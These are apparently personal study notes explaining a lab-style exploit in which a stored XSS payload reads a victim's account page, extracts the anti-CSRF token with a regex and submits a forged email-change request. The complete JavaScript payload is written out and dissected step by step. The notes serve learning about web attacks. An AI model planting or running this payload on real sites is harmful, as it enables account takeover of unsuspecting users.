##### **Detailed Breakdown of the Exploit: Leveraging XSS to Bypass Anti-CSRF Tokens** The provided JavaScript exploit payload demonstrates sophisticated exploitation of **stored XSS** to perform an unauthorized action (email address change) bypassing the site's **Anti-CSRF protection**. Here's the original payload explained clearly and systematically: ```html <script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get', '/my-account', true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/my-account/change-email', true); changeReq.send('csrf=' + token + '&[email protected]'); }; </script> ``` --- ##### **Step-by-Step Exploit Explanation** ### 1️⃣ **Initial XMLHttpRequest (GET /my-account)** The first step of the exploit uses JavaScript's XMLHttpRequest object to perform a silent, background HTTP GET request to fetch the victim’s personal user account page (`/my-account`): ```javascript var req = new XMLHttpRequest(); req.onload = handleResponse; // Set callback when response is received req.open('get', '/my-account', true); // Method, URL, async=true req.send(); // Execute request ``` **Why this works:** - Victims viewing the malicious comment have an active session. Their browser sends session cookies automatically with the request due to Same-Origin Policy (SOP), authenticating the request as legitimate. - This request silently retrieves the HTML content of `/my-account`. --- ### 2️⃣ **Extracting the Anti-CSRF Token from Response** The application protects POST requests (`/my-account/change-email`) with a hidden **CSRF token** within a form element, typically like: ```html <input type="hidden" name="csrf" value="RANDOM_TOKEN_VALUE"> ``` The exploit cleverly parses this token from the page source: ```javascript function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; ``` ![[CleanShot 2025-04-12 at 13.06.54.png]] **Token Extraction Explained:** - `this.responseText` contains the full HTML page content fetched from `/my-account`. - A JavaScript regex (`/name="csrf" value="(\w+)"/`) matches the hidden token’s value attribute. - `(\w+)` captures the token as a group, accessible via `[1]`. - The captured CSRF token is stored in the `token` variable. **Example of responseText snippet:** ```html <input required type="hidden" name="csrf" value="0ZkLZ7bmyhBj71e4YFky15MAN4NpyBdH"> ``` --- ### 3️⃣ **Forged POST Request with Captured Token (Email Change)** With the valid CSRF token extracted, the exploit issues a POST request directly to `/my-account/change-email`: ```javascript var changeReq = new XMLHttpRequest(); changeReq.open('post', '/my-account/change-email', true); changeReq.send('csrf=' + token + '&[email protected]'); ``` **Details of the Forged Request:** - Sends a POST request to `/my-account/change-email`. - Includes the legitimate extracted CSRF token (`csrf=VALID_TOKEN`). - Submits a malicious parameter: `[email protected]`. - The victim’s authenticated session cookie automatically accompanies the request, fulfilling the site's authentication and CSRF validation logic. **Why the exploit bypasses Anti-CSRF protection:** - The CSRF protection mechanism is based on tokens meant to be inaccessible to attackers. - Using stored XSS, attackers execute JavaScript in the victim’s browser context, making the token directly retrievable and usable. - The browser executes requests automatically, ensuring that session cookies and tokens are properly aligned, fulfilling all security checks. --- ### ⚠️ **Illustrative Example (Complete Attack Flow)** ![[CleanShot 2025-04-12 at 13.24.08.png]]